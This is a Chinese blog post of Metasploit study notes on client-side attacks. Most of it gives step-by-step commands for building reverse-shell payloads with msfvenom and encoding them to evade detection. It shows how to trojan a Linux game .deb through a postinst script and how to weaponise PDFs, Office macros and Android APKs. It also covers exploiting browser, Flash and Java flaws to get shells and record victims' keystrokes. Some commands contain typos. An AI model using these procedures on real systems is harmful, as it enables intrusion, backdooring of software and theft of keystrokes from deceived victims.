MSF(五):客户端渗透

最新推荐文章于 2023-06-05 06:00:00 发布
最新推荐文章于 2023-06-05 06:00:00 发布
阅读量848 收藏 8
点赞数 3
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/104339298
版权

客户端渗透

安全牛学习Metasploit Framework笔记

在无法突破网络边界的情况下转而攻击客户端

1、含有漏洞利用代码的WEB站点

  • 利用客户端漏洞

2、社会工程学

  • 直接骗取到敏感信息
  • 含有漏洞利用代码的DOC、PDF等文档或Payload,诱骗被害者执行

3、诱骗被害者执行Payload (windows)
注:msfvenom集合了编码、payload

  • msfvenom --list-options -p windows/shell/reverse_tcp
    查看payload的基本信息
  • msfvenom --platform windows -p windows/shel/reverse_tcp LHOST=x.x.x.x LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i -6 -f exe -o 1.exe
参数:
-a:指定目标系统的硬件架构
--platform:指定目标运行平台
-p:指定payload
LHOST:反弹连接的目标IP地址
LPORT:反弹连接的目标端口
-b:去掉坏字符
-e:使用编码模块
-i:编码次数
-f:指定输出文件格式
-o:输出文件名
  • msfconsole (启动侦听,注意payload的port要和前面的msfvenom设置的一样)
    use exploit/multi/handler
    set payload windows/shell/reverse_tcp
    set LHOST x.x.x.x
    set LPORT 9898
    exploit
    只要目标客户端执行我们制作的exe文件,我们即可获得目标shell

4、诱骗被害者执行Payload (Linux Deb安装包)

  • apt-get --download-only install freesweep
    因为只需要dep文件,所以加上参数–download-only,下载好的文件保存在/var/cache/qpt/archives
  • dpkg -x freesweep_0.90-1 i386.deb free
    解压缩目标文件,到指定目录free下
  • mkdir free/DEBIAN && cd free/DEBIAN
  • vi control
    内容:
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
  • vi postinst
    内容:
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/
freesweep_scores & /usr/games/freesweep &
  • msfvenom --platform linux -p linux/x86/shell/reverse_ tcp LHOST=x.x.x.x LPORT=9999 -b "\x00" -f elf -o /root/free/usr/games/freesweep_ scores
  • chmod 755 postinst
  • dpkg-deb --build /root/free
  • 将/root/下的free.deb,传给目标
  • msfconsole启动侦听
    use exploit/multi/handler
    set payload linux/x86/shell/reverse_tcp
    set lport 9999
    exploit(开启侦听)
  • 只要目标dpkg -i free.deb,安装该文件,我们侦听的端口就会获得反弹的shell

5、利用Acrobat Reader漏洞执行payload

(1)构造PDF文件,诱使目标点击

  • exploit/windows/fileformat/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
  • use exploit/multi/handleer(开启侦听)
  • set payload windwos/meterpreter/reverse_tcp
  • exploit
  • 只要目标执行PDF文件,我们即可获得shell

(2)构造恶意网站:,诱使目标访问

  • exploit/windows/browser/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
    (原理:只要目标访问我们设定的网址,便会执行漏洞代码;随后反弹shell给我们的攻击机)
  • use priv
    本地提权
  • run post/windows/capture/keylog_recorder
    对目标客户端启动键盘记录
  • msf外tail查看目标键盘最新输入的数据,tail -f实时查看目标键盘最新输入的数据

6、利用Flash插件漏洞执行payload
(1)攻击模块一

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf
  • 设置反弹shell

(2)攻击模块二

  • use exploit/multi/browser/adobe_flash_opaque_background_uaf
  • 设置反弹shell

(3)辅助模块(该模块打包所有和浏览器相关的漏洞利用模块)

  • use auxiliary/server/browser_autopwn2
  • run
    在自动选取高质量浏览器利用模块
    原理:只要目标浏览器访问了我们设置的地址,便会将自动选取的利用模块依次利用,可以成功利用的模块即返回信息

7、利用IE浏览器漏洞执行payload

  • use exploit/windows/browser/ms14_064_ole_code_execution
  • set payload windows/meterpreter/reverse_tcp
  • exploit

8、利用JRE漏洞执行payload
(1)攻击模块一

  • use exploit/multi/browser/java_ jre17_driver_manager
  • set payload java/meterpreter/reverse_tcp

(2)攻击模块二

  • use exploit/multi/browser/java_jre17_jmxbean
  • set payload java/meterpreter/reverse_tcp

(3)攻击模块三

  • use exploit/multi/browser/java_jre17_reflection_types
  • set payload java/meterpreter/reverse_tcp

9、生成Android后门]程序
(1)攻击模块一(这种方法我没有生成apk,因为-f参数没有apk选项,所以干脆省略,但使用安卓手机解析时会显示出问题)

  • use payload/android/meterpreter/reverse_tcp
  • generate -f a.apk -p android -o peak.apk
    -p:目标平台、-o:生成文件
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
    (2)攻击方法二(因为-f不存在apk,所以可以将-f参数省略,直接-o或>,这一种解析不会出问题)
  • msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.100.162 lport=8899 -o peak.apk
  • use /exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • exploit

10、VBScript感染方式
(1)利用宏感染word、excel文档,绕过某些基于文件类型检查的安全机制

(2)生成vbscript脚本msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe

(3)Office 2007 +(office版本2007以上)

  • 新建word文档,选择视图一一宏一一创建
  • 在创建的宏里粘入Payload第一部分的VBA代码
由
Sub Auto_Open()
				Goepu12
End Sub
到
Sub Workbook_Open()
				Auto_Open
End Sub
  • word文档正文沾入Payload第二部分的内容

    Jjiktezjhl
    到最后
    (4)Msf启动侦听
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • exploit

(5)只要目标打开office,攻击机即可获得shell

1stPeak
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
postgre数据库连接
weixin_34261415的博客
01-18 1145
场景:问题1. 不知道postgre数据库密码,无法通过msfpro cli模式手动连接数据库问题2. 无法通过连接工具远程连接postgre数据库过程:问题1:1. 新建postgre超级用户root@kali:~# su postgrespostgres@kali:/root$ createuser -P 9999为新角色输入的口令:再...
metasploit framework 笔记 | msf5 使用技巧
VI___
02-02 5162
一、典型的攻击步骤 ① use exploit/操作系统类型/漏洞类型/具体漏洞模块名称 ——指定要使用漏洞利用模块 ② set SRVHOST 攻击源IP ③ set PAYLOAD windows/meterpreter/reverse_tcp ——设置攻击载荷,也就是 shellcode,可以用来接收反弹的shell ④ set LHOST 被攻击者IP ⑤ expl...
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 2660
Metasploit初体验(一)
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
【kali】metasploit渗透测试工具使用教程
Kris__zhang的博客
06-23 8025
metasploit概述 是一款开源的安全漏洞检测工具,它可以帮助网络安全和IT专业人士识别安全性问题,验证漏洞的解决措施,从而完成对目标的安全性评估 该工具包括了 智能开发,代码审计,web应用程序扫描和社会工程等各项功能 什么是metasploit 可以用来发现漏洞,利用漏洞,提交漏洞,并实施攻击,用户可以从其他 漏洞扫描程序导入数据,基于漏洞主机的详细信息来发现可攻击漏洞 模块按照不同用途可分为7中类型,分别是Exploits(渗透攻击模块),Auxiliary(辅助模块),Post(后渗透攻击模块
全网最详细实战Chrome RCE上线msf和cs
众生度尽,方证菩提
06-05 428
不为圣贤,便为禽兽​;莫问收获,但问耕耘。
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1773
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
ReverseTcpshell使用教程
m0_53087192的博客
03-11 446
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
msf完整渗透测试
clayzx的博客
11-15 6467
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
msf 渗透测试
06-05
msf渗透
msf5 自动攻击模块 db_autopwn
07-10
msf5 自动攻击模块 db_autopwn msf5 自动攻击模块 db_autopwn
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
MSF19:Maumee夏季博览会网站2019
04-15
盖茨比的默认启动器 使用此默认样板启动您的项目。 该入门工具随附了主要的Gatsby配置文件,您可能需要使用React的快速应用生成器来快速启动和运行。 还有其他更具体的想法吗? 您可能需要查看我们充满活力的集合。...
kali 渗透msf
11-14
kali渗透测试利器
利用MS17-010渗透win7(32位)
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
MSF(六):后渗透
1stPeak's Blog
02-21 4939
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
MSF(二):msf外部/内部常用命令
1stPeak's Blog
02-21 4697
msf外内部常用命令 安全牛学习Metasploit Framework笔记 1、msf外部命令 msfconsole -h/-q/-r/-v/exit msf的帮助信息/安静启动,没有banner/使用msfconsole自动化执行rc文件里的内容/msf版本/退出msf help/?/help xxx 帮助信息/帮助信息/查看具体名称的帮助i信息 service postgresql s...
利用MS17-010渗透win7(64位)
1stPeak's Blog
06-07 4538
这里是接着之前一篇"利用MS17-010渗透win7(32位)"的姊妹篇,想了解win7(32位)如何利用永恒之蓝渗透的请点击利用MS17-010渗透win7(32位) Win7x64的渗透,我们就可以不用下载利用模块了,kali里已经帮你集成好了 我这里的攻击机(192.168.1.222),靶机(192.168.1.111),记得靶机关闭防火墙 渗透流程 权限提升利用 渗透...
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
最新发布
07-08
抱歉,但我不太清楚你的问题是什么。你似乎提到了一个错误消息"[-] Msf::OptionValidateError The following options failed to validate: RHOSTS",但我不知道这是什么意思。能否提供更多背景信息或者明确你的问题是什么?这样我才能更好地回答你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值